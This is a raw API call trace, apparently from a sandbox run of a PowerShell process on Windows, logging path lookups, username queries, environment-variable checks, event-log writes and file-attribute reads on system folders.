	[0169.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.439] GetLastError () returned 0xcb
	[0169.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.440] GetLastError () returned 0xcb
	[0169.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.440] GetLastError () returned 0xcb
	[0169.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.440] GetLastError () returned 0xcb
	[0170.255] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0170.255] GetLastError () returned 0x3
	[0170.255] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0170.256] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b49388*="Certificate", lpRawData=0x2b49244) returned 1
	[0170.431] GetLastError () returned 0x0
	[0170.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.442] GetLastError () returned 0xcb
	[0170.450] GetLogicalDrives () returned 0x4
	[0170.450] GetLastError () returned 0xcb
	[0170.450] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e03c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.450] GetLastError () returned 0xcb
	[0170.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0170.450] GetLastError () returned 0xcb
	[0170.451] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x721bd8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0170.451] GetLastError () returned 0xcb
	[0170.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.453] GetLastError () returned 0xcb
	[0170.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.453] GetLastError () returned 0xcb
	[0170.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.701] GetLastError () returned 0xcb
	[0170.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.703] GetLastError () returned 0xcb
	[0170.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.704] GetLastError () returned 0xcb
	[0170.704] SetErrorMode (uMode=0x1) returned 0x1
	[0170.704] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2b502a8 | out: lpFileInformation=0x2b502a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.704] GetLastError () returned 0xcb
	[0170.704] SetErrorMode (uMode=0x1) returned 0x1
	[0170.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14de8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.704] GetLastError () returned 0xcb
	[0170.704] SetErrorMode (uMode=0x1) returned 0x1
	[0170.704] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2b5043c | out: lpFileInformation=0x2b5043c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.704] GetLastError () returned 0xcb
	[0170.704] SetErrorMode (uMode=0x1) returned 0x1
	[0170.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.710] GetLastError () returned 0xcb
	[0170.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14dfd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.722] GetLastError () returned 0xcb
	[0170.722] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14df50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.722] GetLastError () returned 0xcb
	[0170.722] SetErrorMode (uMode=0x1) returned 0x1
	[0170.723] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14e3d0 | out: lpFileInformation=0x14e3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0170.723] GetLastError () returned 0xcb
	[0170.723] SetErrorMode (uMode=0x1) returned 0x1
	[0170.723] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14df50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.723] GetLastError () returned 0xcb
	[0170.723] SetErrorMode (uMode=0x1) returned 0x1
	[0170.723] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14e3d0 | out: lpFileInformation=0x14e3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0170.723] GetLastError () returned 0xcb
	[0170.723] SetErrorMode (uMode=0x1) returned 0x1
	[0170.723] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14df64, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.723] GetLastError () returned 0xcb
	[0170.723] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14df00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.723] GetLastError () returned 0xcb
	[0170.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.723] GetLastError () returned 0xcb
	[0170.723] SetErrorMode (uMode=0x1) returned 0x1
	[0170.723] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e3d0 | out: lpFileInformation=0x14e3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.723] GetLastError () returned 0xcb
	[0170.723] SetErrorMode (uMode=0x1) returned 0x1
	[0170.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.723] GetLastError () returned 0xcb
	[0170.723] SetErrorMode (uMode=0x1) returned 0x1
	[0170.724] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e3d0 | out: lpFileInformation=0x14e3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.724] GetLastError () returned 0xcb
	[0170.724] SetErrorMode (uMode=0x1) returned 0x1
	[0170.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.724] GetLastError () returned 0xcb
	[0170.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.724] GetLastError () returned 0xcb
	[0170.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.724] GetLastError () returned 0xcb
	[0170.724] SetErrorMode (uMode=0x1) returned 0x1
	[0170.724] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e3d0 | out: lpFileInformation=0x14e3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.724] GetLastError () returned 0xcb
	[0170.724] SetErrorMode (uMode=0x1) returned 0x1
	[0170.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.724] GetLastError () returned 0xcb
	[0170.724] SetErrorMode (uMode=0x1) returned 0x1
	[0170.724] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e3d0 | out: lpFileInformation=0x14e3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.724] GetLastError () returned 0xcb
	[0170.724] SetErrorMode (uMode=0x1) returned 0x1
	[0170.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.724] GetLastError () returned 0xcb
	[0170.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.725] GetLastError () returned 0xcb
	[0170.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14df5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.725] GetLastError () returned 0xcb
	[0170.725] SetErrorMode (uMode=0x1) returned 0x1
	[0170.725] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e3dc | out: lpFileInformation=0x14e3dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.725] GetLastError () returned 0xcb
	[0170.725] SetErrorMode (uMode=0x1) returned 0x1
	[0170.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14df5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.725] GetLastError () returned 0xcb
	[0170.725] SetErrorMode (uMode=0x1) returned 0x1
	[0170.725] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14e3dc | out: lpFileInformation=0x14e3dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.725] GetLastError () returned 0xcb
	[0170.725] SetErrorMode (uMode=0x1) returned 0x1
	[0170.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.725] GetLastError () returned 0xcb
	[0170.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14df0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.725] GetLastError () returned 0xcb
	[0170.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14df5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.725] GetLastError () returned 0xcb
	[0170.725] SetErrorMode (uMode=0x1) returned 0x1
	[0170.726] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e3dc | out: lpFileInformation=0x14e3dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.726] GetLastError () returned 0xcb
	[0170.726] SetErrorMode (uMode=0x1) returned 0x1
	[0170.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14df5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.726] GetLastError () returned 0xcb
	[0170.726] SetErrorMode (uMode=0x1) returned 0x1
	[0170.726] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14e3dc | out: lpFileInformation=0x14e3dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.726] GetLastError () returned 0xcb
	[0170.726] SetErrorMode (uMode=0x1) returned 0x1
	[0170.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.726] GetLastError () returned 0xcb
	[0170.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14df0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.726] GetLastError () returned 0xcb
	[0170.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.731] GetLastError () returned 0xcb
	[0170.731] SetErrorMode (uMode=0x1) returned 0x1
	[0170.732] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2b581e4 | out: lpFileInformation=0x2b581e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.732] GetLastError () returned 0xcb
	[0170.732] SetErrorMode (uMode=0x1) returned 0x1
	[0170.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.733] GetLastError () returned 0xcb
	[0170.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.733] GetLastError () returned 0xcb
	[0170.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.733] GetLastError () returned 0xcb
	[0170.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.733] GetLastError () returned 0xcb
	[0171.053] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e5c8) returned 0x1
	[0171.053] GetLastError () returned 0xcb
	[0171.053] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e5d0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e5d0) returned 1
	[0171.055] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b78bc8*="Available", lpRawData=0x2b78a84) returned 1
	[0171.149] GetLastError () returned 0x0
	[0171.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.150] GetLastError () returned 0xcb
	[0171.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.150] GetLastError () returned 0xcb
	[0171.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.162] GetLastError () returned 0xcb
	[0171.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.162] GetLastError () returned 0xcb
	[0171.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.162] GetLastError () returned 0xcb
	[0171.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e04c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.177] GetLastError () returned 0xcb
	[0171.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.177] GetLastError () returned 0xcb
	[0171.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.177] GetLastError () returned 0xcb
	[0171.177] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0171.177] GetLastError () returned 0xcb
	[0171.177] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0171.177] GetLastError () returned 0xcb
	[0171.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e04c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.177] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e04c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
	[0171.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dffc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.178] GetLastError () returned 0xcb
